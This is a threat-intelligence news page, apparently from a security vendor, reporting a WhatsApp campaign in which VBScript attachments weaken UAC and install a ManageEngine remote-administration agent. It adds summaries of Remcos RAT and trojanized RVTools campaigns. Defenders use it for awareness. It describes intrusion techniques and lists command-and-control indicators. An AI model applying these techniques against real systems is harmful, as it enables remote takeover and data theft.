Malicious VBScript Sent via WhatsApp Installs ManageEngine RMM Agent
Researchers reported an active campaign in which compromised WhatsApp accounts sent malicious .vbs attachments to targets in multiple countries, with most observed infections in Malaysia. The lures impersonated business, banking, tax, and debt-related documents and primarily targeted users of WhatsApp Desktop and WhatsApp Web. When opened, the VBScript launched through Windows Script Host, created hidden working directories, and fetched additional payloads from attacker-controlled infrastructure while using obfuscation and renamed native tools such as curl.exe and bitsadmin.exe to reduce detection.
A second-stage script attempted to weaken Windows User Account Control by changing ConsentPromptBehaviorAdmin, then downloaded a ZIP archive containing a preconfigured ManageEngine Endpoint Central deployment package. The final stage silently installed the legitimate ManageEngine Endpoint Central agent via msiexec.exe, giving the attacker remote administration access to the compromised system. Attribution remains unconfirmed, but researchers noted simplified Chinese comments in the scripts and infrastructure overlap with IP addresses previously associated with ValleyRAT and Gh0st RAT activity, indicating with low confidence that a Chinese-speaking operator may be behind the campaign.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
2 events from the most recent confirmed update back to the earliest known activity.
Kaspersky reveals new technical and attribution details on WhatsApp malware
Kaspersky disclosed additional details on the WhatsApp malware campaign, saying hijacked accounts sent fake debt-related VBScript attachments that used multi-stage obfuscated scripts, attempted to weaken Windows UAC via registry changes, and silently installed a pre-configured ManageEngine Endpoint Central agent. The researchers also reported infrastructure overlap with activity linked to ValleyRAT and Gh0st RAT, but said attribution remained unconfirmed and only low-confidence indicators suggested a Chinese-speaking operator.
Researchers observe WhatsApp-delivered VBS malware campaign
Researchers observed an active malware campaign in June 2026 in which compromised WhatsApp accounts sent malicious VBScript attachments to victims in multiple countries, with Malaysia accounting for most observed infections. The infection chain ultimately installed the legitimate ManageEngine Endpoint Central agent to provide the attacker with remote administration access.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
8 references tracked. Mallory keeps watching after this page renders.
WhatsApp VBScript Campaign Uses Fake Documents to Install ManageEngine RMM Tool
thehackernews.com
Open sourceA VBScript Campaign Distributed Through WhatsApp Deploying RMM Software | Community Portal | Gurucul
community.gurucul.com
Open sourceWhatsApp Malware Campaign Targets Global Users Through Fake Financial Documents and Remote Access Tools - CySecurity News - Latest Information Security and Hacking Incidents
cysecurity.news
Open sourceWhatsApp Malware Campaign Hijacks Trust, Installs Legitimate Admin Tools
securityaffairs.com
Open sourceNew Malware Attack Via WhatsApp Attacking Windows System to Enable Remote Access For Attackers
cybersecuritynews.com
Open sourceA VBScript campaign distributed through WhatsApp deploying RMM software - Malware News - Malware Analysis, News and Indicators
malware.news
Open sourceWhatsApp phishing attack uses fake business docs to hack PCs
bleepingcomputer.com
Open sourceAn unknown actor distributes malicious VBS scripts via WhatsApp | Securelist
securelist.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
WhatsApp Malware Campaign Used VBS Files and Unsigned MSI Backdoors
Microsoft reported a multi-stage malware campaign that used **WhatsApp messages** to trick targets into opening malicious **Visual Basic Script** (`.vbs`) files. The activity, observed from late February 2026, relied on social engineering and trusted cloud infrastructure including **AWS S3**, **Tencent Cloud**, and **Backblaze B2** to host follow-on payloads. After execution, the malware created hidden folders under `ProgramData`, downloaded additional VBS components, and used renamed legitimate Windows utilities to blend into normal system activity. The intrusion chain then attempted **UAC bypass**, registry changes for persistence, and deployment of unsigned MSI installers including `Setup.msi`, `WinRAR.msi`, `LinkPoint.msi`, and `AnyDesk.msi`, which provided remote access and backdoor capability on compromised systems. Microsoft said the attackers abused living-off-the-land techniques such as renaming `curl.exe` and `bitsadmin.exe` while leaving original PE metadata intact, giving defenders a detection opportunity; the company also linked the activity to command-and-control domains **`neescil.top`** and **`velthora.top`** and published indicators, file hashes, and hunting guidance for defenders.
Apr 22, 2026
Phishing Campaigns Deliver Remcos RAT via Obfuscated Scripts and Trusted Services
Researchers reported multiple **Remcos RAT** campaigns using phishing emails and trusted infrastructure to infect victims while evading detection. In one intrusion chain, a ZIP attachment named `MV MERKET COOPER SPECIFICATION.zip` delivered an obfuscated JavaScript file that fetched a PowerShell loader from `almacensantangel[.]com`; the loader then reconstructed and decrypted payloads in memory, including `ALTERNATE.dll` and `Cqeqpvzeia.exe`. The malware injected into the legitimate Microsoft .NET utility `aspnet_compiler.exe`, communicated with `192[.]3[.]27[.]141:8087`, and stored captured keystrokes and other data in `C:\ProgramData\remcos\logs.dat`, leaving few disk artifacts. A separate campaign used phishing emails that linked to a fake Google Drive sharing page hosted through **Google Cloud Storage** and the trusted `googleapis.com` domain, helping the attack bypass email and web filtering. After user interaction, the infection chain used staged JavaScript redirects or downloads, followed by VBScript or PowerShell execution to retrieve the final Remcos payload, which was then injected into a legitimate Windows process through **process hollowing**, persisted via Windows Registry entries, and opened encrypted command-and-control channels. The activity underscores how attackers are combining living-off-the-land techniques, trusted cloud services, obfuscated scripting, and legitimate Windows binaries to deploy Remcos for surveillance and data theft.
Apr 25, 2026
Signed Fake RVTools Installer Deploys Python RAT on VMware Admin Systems
Researchers reported a malware campaign distributing a trojanized **RVTools** installer signed with a legitimately issued **Sectigo** code-signing certificate linked to Xiamen Lunwei Huage Network Co., Ltd., allowing the malicious MSI to appear trusted and reduce SmartScreen-style warnings. The installer abused MSI Custom Actions to run an obfuscated VBScript loader, which launched hidden PowerShell and downloaded a roughly 33 MB archive, `winp.zip`, from Dropbox into `AppData`, where staged components unpacked a modular Python remote access trojan. After reboot, the malware executed `collector.py` and `Pmanager.py` to gather host and Active Directory data, save it to `configA.json`, and exfiltrate the information after **RC4** encryption and **zlib** compression via HTTP POST to one of five hardcoded command-and-control servers every 300 seconds. The RAT also enabled command execution and payload delivery, while persistence was established through a Registry Run key and a scheduled task running as **SYSTEM**; researchers warned the campaign is especially dangerous because RVTools is widely used by VMware administrators with elevated privileges, and noted that certificate revocation may not stop execution in environments that do not enforce real-time **OCSP** or **CRL** checks.
Jun 2, 2026